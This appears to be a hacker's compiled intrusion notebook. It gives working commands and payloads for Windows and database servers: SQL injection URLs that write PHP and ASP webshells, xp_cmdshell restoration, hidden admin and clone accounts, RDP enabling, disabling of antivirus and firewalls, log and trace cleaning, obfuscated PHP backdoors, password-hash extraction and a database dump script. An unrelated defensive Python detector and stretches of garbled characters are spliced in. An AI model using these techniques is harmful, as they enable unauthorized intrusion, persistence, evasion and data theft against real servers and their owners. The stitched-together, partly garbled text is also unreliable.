1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore it.

2. A rather clever way to create a clone account
First create an ordinary user account,
then export its registry key. Then delete the account in Computer Management,
re-import the key, and add the account to the Administrators group.

3. Reading the radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg

4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe",
then under it create a string value
whose data is the full path of the trojan.

5. runas /user:guest cmd
Tests what that user is allowed to do.

6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This actually relies on the tlntadmn command; for details, type /? and have a look. (This one needs administrator privileges.) Creating an identically named user to pass NTLM authentication needs no explanation from me, right?

7. After the intrusion: patching the vulnerability, cleaning traces, planting backdoors:
Basic vulnerabilities must be patched, e.g. SU privilege escalation, SA injection and so on. For DBO injection, consider removing xp_treelist and xp_regread, but note down the web directory yourself first. You absolutely must remember to clean up traces. For sqlserver connections, Enterprise Manager is better; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers. Delete them. When clearing IIS logs, do not use an AIO-type tool that deletes the logs completely; choose a logcleaner-type tool that removes only the access records for a given IP. If you can gina the administrator password, log in as them to clear the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally, leave a backdoor that writes no log records. I never go without several one-line backdoors, a standard backdoor and a cfm backdoor. Remember to change the timestamps. There is also a nastier trick: if the machine is just an ordinary bot, drop a TXT on the administrator's desktop telling them you broke in, placed a certain backdoor and added a certain user (not your real important backdoor, of course) and ask them to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'

9. On MSSQL SERVER 2005 xp_cmdshell sits behind a configuration switch by default; to enable it you have to turn it on through the advanced options mode.
This can be done directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedure has been deleted, there is a very simple way to restore it:
Delete
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores it directly, regardless of whether sp_addextendedproc still exists.

-----------------------------
Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is present.

Restore xp_cmdshell
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked;
otherwise upload xplog70.dll and run
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell
sp_dropextendedproc "xp_cmdshell"
-------------------------
Clear the 3389 login history with one built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.

View the current user's privileges in mysql
show grants for

The following statements create an account with the same privileges as the ROOT user. You have probably run into this when taking a site: the mysql root user may only connect locally and refuses outside connections. The following method solves that; the statements below create a user itpro with password 123, privileges equal to root, and permission to connect from any host. That makes it convenient to work on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION

MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0

MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints.

Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro` ;

Getting system privileges from the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>

Breaking through the captcha limit to get into the back end and get a shell:
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry, restart IE,
and that is it.

Writing a shell via union
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applies to the dedecms injection vulnerability: writing a shell without back-end access.

dedecms back end, when there is no file manager and no outfile privilege:
in Plugin Management - Virus Scan
write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.

In oracle, after logging in as a low-privileged user, you can run the following statement to query the hashes of sys and other users, then crack them with cain
Code:
select username,password from dba_users;

mysql remote connection user
Code:

Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal services port

xp&2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 firewall restrictions on the terminal services port 3389 and on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f

5. Enable terminal services on Win2000, port 3389 (requires reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically after the last line runs)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (requires reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal server has reached its maximum number of connections, connect with the command below

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control over the C: drive)
cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")

Delete the awgina.dll registry value
Code:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to disable LM hash storage.

Database security: common commands used when intruding Oracle databases
Recently I came across a server running an Oracle database; after cramming Oracle and consulting experts I finally got hold of all the user passwords for the site's back-end admin interface. I found Oracle really painful to work with, so to spare my brothers some detours I have compiled the commands needed during an intrusion.
1. su - oracle  Not required; useful when you do not have the DBA password, as it lets you enter the sqlplus interface without one.
2. sqlplus /nolog or sqlplus system/manager or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper) or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$databases; view the database structure fields
7. How to see which users have SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the currently connected database user
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the structure of all columns of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant the user privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a database user's password: (change the sys and system passwords to test)
alter user sys identified by test;
alter user system identified by test;

applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml  database connection configuration
\WEB-INF\server.xml  roughly the equivalent of http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  file directory structure
spring.properties  contains the name of the hibernate.cfg.xml file

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, look at the class files.

Viewing shared folders inside the virtual machine:
run this in cmd inside the virtual machine
\\.host\Shared Folders

Tip for finding the terminal services port from a cmdshell
Finding the terminal port:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs.
The service name corresponding to terminal services is TermService.
Step 2: netstat -ano lists the PID for every port.
Find the port matching that PID.

Query the password hash in sql server 2005
SELECT password_hash FROM sys.sql_logins where name='sa'

SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from access

Complete code for adding a user through mysql on a Chinese-language OS:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;

A note on how to deal with the pesky Norton
Look up the path of the Norton service
sc qc ccSetMgr
Then set permissions to deny access. Go all the way.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server
iisreset /reboot
That does it. But once finished, remember to restore the permissions.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F

SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
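A defender-side check for the literal-concatenation trick in the line above, and for the xp_cmdshell / sp_oacreate / addextendedproc calls earlier in these notes. This is an added example, not code from the original notes: it folds 'a'+'b' literals in T-SQL text, strips comments, and reports which watched procedure names appear, run over constructed sample queries (the WATCHED list and the samples are assumptions for the example, not a complete catalogue).

```python
import re

# Added defender-side example (not code from the original notes): flag T-SQL
# text that reaches dangerous extended procedures even when the name is split
# across concatenated literals, as in
#   EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
# The WATCHED names and the sample queries below are constructed for this example.

WATCHED = (
    "xp_cmdshell",
    "sp_oacreate",
    "sp_oamethod",
    "addextendedproc",   # matches both sp_addextendedproc and dbcc addextendedproc
    "xp_dirtree",
    "xp_regread",
)

# One T-SQL single-quoted literal: a quote inside the body is written as ''.
_LIT = r"'((?:[^']|'')*)'"
# Two literals joined by '+', e.g. 'ma' + 'ster'
_CONCAT = re.compile(_LIT + r"\s*\+\s*" + _LIT)


def fold_concat(sql: str) -> str:
    """Merge 'abc'+'def' into 'abcdef', repeating until nothing changes."""
    prev = None
    while prev != sql:
        prev = sql
        sql = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", sql)
    return sql


def normalize(sql: str) -> str:
    """Fold concatenation, drop comments, un-double quotes, lower-case."""
    s = fold_concat(sql)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # block comments
    s = re.sub(r"--[^\n]*", " ", s)               # line comments
    s = s.replace("''", "'")                      # '' escape -> '
    return re.sub(r"\s+", " ", s).lower()


def find_dangerous_procs(sql: str) -> list:
    """Names from WATCHED that appear in the normalized query text."""
    text = normalize(sql)
    return [name for name in WATCHED if name in text]


# Constructed sample statements, not captured traffic.
SAMPLE_QUERIES = [
    "SELECT name FROM master.dbo.sysobjects WHERE xtype='U'",
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "exec master..xp_cmdshell 'net user'",
    'dbcc addextendedproc("xp_cmdshell","xplog70.dll")',
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output",
    "SELECT 'xp_cmd' + 'shell' AS label FROM t -- split literal in data",
]


def scan(queries) -> list:
    """Return (index, matched names) for every query that trips a rule."""
    hits = []
    for i, q in enumerate(queries):
        found = find_dangerous_procs(q)
        if found:
            hits.append((i, found))
    return hits


if __name__ == "__main__":
    for i, found in scan(SAMPLE_QUERIES):
        print(f"query {i}: {', '.join(found)}")
```

The same normalization can be applied to SQL Server audit or trace output before string matching, so that a split name no longer slips past a plain keyword filter.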
Some notes on postgresql injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;

How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom function backed by libc, the other uses pl/python.
In either case the postgresql version must be greater than 8.X.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, redirecting its output to a file:
SELECT system('uname -a > /tmp/test')

copy the output into the table;
COPY stdout(system_out) FROM '/tmp/test'

Read the output back from the output table to check whether execution succeeded

SELECT system_out FROM stdout

Below is a test example

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

net stop sharedaccess  stop the default firewall
netsh firewall show  show/config default firewall
netsh firewall set notifications disable  disable the notify when the program is disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost  add the program which is allowed by default firewall
Method for changing the 3389 port (harder to find with scanners after the change)
Change the port setting on the server side; two places in the registry need to change

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
The PortNumber value, default 3389; change it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
The PortNumber value, default 3389; change it to the port you want, e.g. 6000

That is all. Reboot the system and it takes effect.

Script to log 3389 remote logins
Save as a bat file
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer

mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.

/f -- starts the client in full-screen mode.

/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created by Client Connection Manager
to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which is equivalent to logging on to the computer a second time. In other words, connecting with the console parameter gets you the desktop shown on the monitor. Give it a try; it comes in handy sometimes, especially with some software that
mstsc /console /v:124.42.126.xxx  gets around the terminal connection limit
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess

Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2  view users' passwords

Export an access database directly as a shell; prerequisites: table a exists in the access database and you know the site's real path
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141. During manual MSSQL injection, when you cannot write out of band, most people read the records out one by one, which is exhausting; here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

How to disable McAfee: // requires system privileges, use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to bypass the McAfee executable restriction
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Attachment: VNCDump.zip (4.76 KB)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump; it can also be read from dos by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]

exec master..xp_cmdshell 'net user'
Executing commands in mssql.

Query to get the mssql password hashes
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
3 U# w9 P7 J: o! E" ?% |/ sbackup log dbName with TRUNCATE_ONLY;! p# R: d0 p: d( @; M, o# t
DBCC SHRINKDATABASE(dbName);5 I; h" H3 f9 T) y
mssql数据库压缩
- M+ L6 V2 E( P* h3 e' V
1 C2 x& n- Y) ^' oRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
9 |/ x [ y/ }( d' m将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。6 @' a$ ?0 }6 A+ O; `
! n5 i% ~0 G; g. T
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
# z" V/ y( j3 ^备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
" ~. R2 @ u* k; Q% p* a
Discuz!NT 3.5 penetration notes:
(1) Visit <site>/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) rss.aspx opens in the template editor. Copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-line backdoor is now at http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively archives the website directory
Mind the path to rar.exe
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
A PHP one-liner smuggled into a config file whose values are written without filtering: inside a double-quoted string PHP evaluates the ${...} expression, so the eval runs every time the config file is included.
Dumping a database when the web server and the database server are separate hosts
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
(The SQL Server host maps a share on the web server, then bcp exports the table straight onto it.)
When restrictions stop you uploading a full webshell and all you have is a one-liner, it is still enough to do anything, just not convenient, for example dumping the database.
This uses the client's expert mode (you write the code yourself).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
// flush the final partial batch (rows past the last multiple of 500)
if ($tmp !== '') {
    file_put_contents('/home/httpd/bbs.xxxxx/forumdata/cache/user'.(intval($i/500)+1).'.txt', $tmp);
}
mysql_free_result($result);

// delete the files once downloaded

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: fingerprint the web server / operating system
Scan every port on 192.168.1.100:
nmap -Pn -sT -sV -p0-65535 192.168.1.100
(-Pn skips host discovery; older nmap spells it -PN.)
host -t ns www.owasp.org   identify the name servers and gather DNS information (NS records live at the zone apex, so query owasp.org rather than the www host if this returns nothing)
host -l www.owasp.org ns1.secure.net   attempt a zone transfer of owasp.org from that server
Netcraft DNS search: http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com  syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/  syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still private)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database fails with "Data too long for column 'username' at row 1". The cause is that the connection character set cannot represent the Chinese text; run set names gb2312 (or utf8, whichever matches the dump) before the import.

Changing a MySQL password:
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-line backdoors

During intrusions I came across many advanced PHP one-liners. Recording them here so they can be hunted by keyword later.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// China Chopper one-liner: the function name is assembled from single characters so a grep for preg_replace never sees it, and the /e modifier evaluates the replacement ($_POST['h']) as PHP (the modifier was removed in PHP 7.0, so this only works on older interpreters)
2.
$filename=$_GET['xbid'];
include ($filename);
